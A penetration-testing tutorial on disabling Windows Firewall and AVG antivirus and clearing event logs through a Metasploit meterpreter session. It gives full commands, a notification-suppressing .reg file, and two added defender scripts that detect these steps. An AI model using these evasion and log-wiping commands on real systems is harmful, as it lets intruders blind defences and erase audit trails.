metasploit

One of the most important parts of performing a penetration test is being able to work undetected. A firewall may block you, and antivirus software may detect your activities. If an antivirus detects your activities, the penetration test will not look very professional in the eyes of your client.

So one of the first things you may want to try once you have exploited the remote system is to disable any antivirus solution and firewall. For this article we will use the Windows Firewall and AVG 2014 as the antivirus.

Let's say that we have exploited the remote machine, which in this scenario is running Windows XP as its operating system, and we have SYSTEM privileges.

Screenshot from 2014-06-17 19:36:15

We will instruct meterpreter to give us a shell on the remote system with the command shell.

Now we need to check whether the remote system has the firewall enabled. We will use the command: netsh firewall show opmode

meterpreter > shell

C:\Windows\System32 > netsh firewall show opmode

This shows whether the firewall is enabled on the victim's machine.

Screenshot from 2014-06-17 19:43:07

If it is enabled, we need to disable it. Before disabling the firewall, we need to turn off the notification balloon, because whenever an important change is made to the system a notification appears, which could alert the victim.

So we create a registry file and upload it to the victim's machine to turn off notification alerts. To do that, open your terminal, add the entries below and save them in a .reg file.

# vi disable.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"TaskbarNoNotification"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"TaskbarNoNotification"=-

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"EnableBalloonTips"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"EnableBalloonTips"=-

:wq!

From your meterpreter session, upload this file to the victim's machine and execute it from the command prompt.

meterpreter > upload /home/sathish/disable.reg C:\\Users\\Public

meterpreter > shell

C:\Windows\System32 > cd C:\Users\Public

C:\Users\Public > regedit.exe /s C:\Users\Public\disable.reg
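A .reg file of the kind shown above only imports when it is well formed: a "Windows Registry Editor Version 5.00" header, straight double quotes around value names, a dword: value written in hex, and "=-" meaning delete this value rather than set it. The Python below is an added example, not part of the original article or of Metasploit: a small parser for this format that a defender could run over a .reg dropped in a public folder to see which keys it touches. The sample text is constructed from the article's file, and the WATCHED list of notification-policy values is my assumption of what is worth flagging.

```python
import re

# Constructed sample (not the article's upload): the same shape of .reg file the
# article builds, with straight double quotes, which is what regedit expects.
SAMPLE_REG = """Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer]
"TaskbarNoNotification"=dword:00000001

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer]
"TaskbarNoNotification"=-

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]
"EnableBalloonTips"=-
"""

HEADER = "Windows Registry Editor Version 5.00"
# "name"=value  or  @=value (default value); backslashes in names are escaped.
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')

def decode_value(raw):
    """Decode the right-hand side of a value line. '-' means delete the value."""
    if raw == "-":
        return None
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return raw  # hex:, hex(2): etc. are left as their raw text

def parse_reg(text):
    """Parse a .reg file into {key: {value_name: value}}.
    A key written as [-HKEY...] is a key deletion and maps to None."""
    lines = text.splitlines()
    if not lines or lines[0].strip() != HEADER:
        raise ValueError("missing 'Windows Registry Editor Version 5.00' header")
    result, current = {}, None
    for line in lines[1:]:
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            if key.startswith("-"):
                result[key[1:]], current = None, None
            else:
                current = key
                result.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if current is None or not m:
            # A value outside any key, or curly quotes from a copy-pasted file, end up here.
            raise ValueError(f"unparsable line: {line}")
        name = m.group(1) if m.group(1) is not None else "@"
        result[current][name] = decode_value(m.group(3))
    return result

# Assumed watch list: (key suffix, value name) pairs that suppress user-facing
# notifications; a defender would alert on a .reg file touching these.
WATCHED = {
    ("Policies\\Explorer", "TaskbarNoNotification"),
    ("Explorer\\Advanced", "EnableBalloonTips"),
}

def suspicious_changes(parsed):
    """Return (key, value_name, value) for every watched value the file sets or deletes."""
    hits = []
    for key, values in parsed.items():
        for name, val in (values or {}).items():
            if any(key.endswith(sfx) and name == wn for sfx, wn in WATCHED):
                hits.append((key, name, val))
    return hits

if __name__ == "__main__":
    for key, name, val in suspicious_changes(parse_reg(SAMPLE_REG)):
        print(f"{key}\n    {name} -> {'delete' if val is None else val}")
```

Running it on the constructed sample reports all three notification values (one set to 1, two deletions). Feeding it a file with curly quotes, which is how the article's listing appears when copied from a web page, raises "unparsable line", which is the same reason regedit would silently import nothing.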


Disable the Windows Firewall

As we can see, the firewall is enabled. In order to disable it we will use the command: netsh firewall set opmode mode=disable

C:\Windows\System32 > netsh firewall set opmode mode=disable

Screenshot from 2014-06-17 19:45:24

We can check the remote system in order to see if the firewall has been disabled successfully.

Killav Meterpreter script

The firewall has been disabled and now it is time to kill the antivirus. So we will return to the meterpreter session and run the command killav.

meterpreter > killav

We can see that this meterpreter script killed some processes, including avgrsx.exe. We may assume that the AVG antivirus is now disabled, but the reality is different.

As you can see, the script contains a list with the process names of well-known antivirus products. So when we run the killav script it tries to match the processes on that list against the processes on the remote host in order to find the antivirus and kill it. Now let's investigate the processes on the remote target after we have executed the killav script.

meterpreter > ps

You can see that there are still some AVG processes running. So the meterpreter script didn't work as expected.

Now we will try to categorize these processes in order to see which service each one belongs to. The command that we are going to use is tasklist /svc

We are interested only in the AVG services and their processes, so we will use the command tasklist /svc | find /I "avg" in order to discover them. In this way we have instructed the remote system to return only the entries whose image name contains avg, ignoring case.

meterpreter > shell

C:\Windows\System32 > tasklist /svc | find /I "avg"

Screenshot from 2014-06-17 20:34:20

These are the processes that we need to kill. However, if we try to do so we will notice that it has no effect, because the services avgwd and AVGIDSAgent will restart these processes once they get killed. So let's examine these two services and their attributes.

C:\Windows\System32 > sc queryex avgwd

C:\Windows\System32 > sc queryex AVGIDSAgent

As you can see from the image above, these two services cannot be stopped and cannot be paused. So how are you supposed to disable an antivirus whose services cannot be stopped or paused? The only valid solution is to disable the services, so that on the next reboot of the target these services will not start. We can achieve that by executing the following commands, which you can also see in the image below.

C:\Windows\System32 > sc config avgwd start= disabled

C:\Windows\System32 > sc config AVGIDSAgent start= disabled

Screenshot from 2014-06-17 20:38:39

We will reboot the remote target through the meterpreter session.

Now that the system has restarted, it is time to examine whether there are any AVG processes still running.

meterpreter > shell

C:\Windows\System32 > tasklist /svc | find /I "avg"

We notice from this output that there are 5 processes, and the two processes that correspond to the avgwd and AVGIDSAgent services are missing. This is because we disabled them before the reboot. So we can now kill these 5 processes safely.

Kill the remaining AVG processes

C:\Windows\System32 > taskkill /F /IM "avg*"

The antivirus is now disabled on the remote target and we can continue our work without any fear of being interrupted and discovered by an antivirus or a firewall.

Clear the log files

The last thing that we may want to try is to clear the system log files. We can run the command clearev in meterpreter in order to delete all records from the Event Viewer.

meterpreter > clearev

Screenshot from 2014-06-17 20:43:14
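Each step in this article leaves a trace that a defender can alert on: the firewall state change, the sc config ... start= disabled calls, the silent regedit /s import, the taskkill of antivirus images, and finally clearev, because Windows records the clearing of the Security log as its own event (ID 1102 on Vista and later, 517 on XP and 2003). The Python below is an added example, not from the article or from Metasploit: it runs simple rules over constructed process-creation and log-cleared records and raises the severity when tampering is followed by log clearing. The record shape, the AV_IMAGE_PREFIXES list and the rule regexes are my assumptions; the command lines mirror the ones used above.

```python
import re

# Constructed sample telemetry (not real data): process-creation records of the
# kind a Security 4688 / Sysmon event ID 1 feed would carry, plus one
# "log cleared" record (Security event ID 1102 on Vista and later; 517 on XP/2003).
SAMPLE_EVENTS = [
    {"time": "19:43:07", "type": "process", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": "netsh firewall show opmode"},
    {"time": "19:44:10", "type": "process", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": "regedit.exe /s C:\\Users\\Public\\disable.reg"},
    {"time": "19:45:24", "type": "process", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": "netsh firewall set opmode mode=disable"},
    {"time": "20:38:39", "type": "process", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": "sc config avgwd start= disabled"},
    {"time": "20:38:41", "type": "process", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": "sc config AVGIDSAgent start= disabled"},
    {"time": "20:40:02", "type": "process", "user": "CORP\\alice",
     "cmd": "notepad.exe report.txt"},
    {"time": "20:41:15", "type": "process", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": 'taskkill /F /IM "avg*"'},
    {"time": "20:43:14", "type": "log_cleared", "user": "NT AUTHORITY\\SYSTEM",
     "event_id": 1102, "channel": "Security"},
]

# Image-name prefixes of the antivirus used in the article (assumed list; extend it).
AV_IMAGE_PREFIXES = ("avg",)

# Each rule: (name, compiled regex over the process command line).
RULES = [
    ("firewall_disabled", re.compile(
        r"\bnetsh\b.*\b(adv)?firewall\b.*\b(set\s+opmode\b.*\bdisable|set\s+\w+\s+state\s+off)",
        re.I)),
    ("service_start_disabled", re.compile(
        r"\bsc(\.exe)?\s+config\s+\S+\s+start=\s*disabled\b", re.I)),
    ("silent_reg_import", re.compile(r"\bregedit(\.exe)?\s+/s\b", re.I)),
    ("av_process_killed", re.compile(
        r'\btaskkill(\.exe)?\b.*/IM\s+"?(' + "|".join(map(re.escape, AV_IMAGE_PREFIXES)) + ")",
        re.I)),
]

LOG_CLEARED_IDS = {1102, 517}

def classify(event):
    """Return the rule names that a single event triggers (possibly none)."""
    if event["type"] == "log_cleared":
        return ["event_log_cleared"] if event["event_id"] in LOG_CLEARED_IDS else []
    return [name for name, rx in RULES if rx.search(event["cmd"])]

def analyze(events):
    """Run every rule over every event and return the findings in input order."""
    findings = []
    for ev in events:
        detail = ev.get("cmd") or f"event {ev['event_id']} on {ev['channel']} log"
        for rule in classify(ev):
            findings.append({"time": ev["time"], "user": ev["user"],
                             "rule": rule, "detail": detail})
    return findings

def severity(findings):
    """One defence-evasion action alone is 'low'; two different kinds is 'medium';
    firewall/AV tampering combined with clearing the event log is 'high'."""
    kinds = {f["rule"] for f in findings}
    tamper = {"firewall_disabled", "service_start_disabled", "av_process_killed"}
    if "event_log_cleared" in kinds and kinds & tamper:
        return "high"
    if len(kinds) >= 2:
        return "medium"
    return "low" if kinds else "none"

if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['time']} {f['user']:<22} {f['rule']:<24} {f['detail']}")
    print("severity:", severity(found))
```

On the constructed sample the read-only netsh show and the user's notepad are ignored, six findings come out, and the severity is "high" because the log was cleared after the firewall and service changes. The point of the escalation rule is that clearing the log does not remove the record of the clearing itself, so a SIEM that forwards events as they happen still sees the whole chain.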

Conclusion

Every penetration tester needs to know how to disable a firewall or an antivirus remotely. This is essential for his penetration testing activities. However, as we saw, the meterpreter script didn't manage to disable the antivirus. This is proof that a penetration test is not an automatic process and also requires the human factor.

Apart from that, the main disadvantage was that this method required a reboot of the remote target in order to disable the antivirus, so if someone was working at the system he would have noticed that something was going wrong, besides the fact that it would have affected his work. However, on a system that nobody is working on it is an effective method.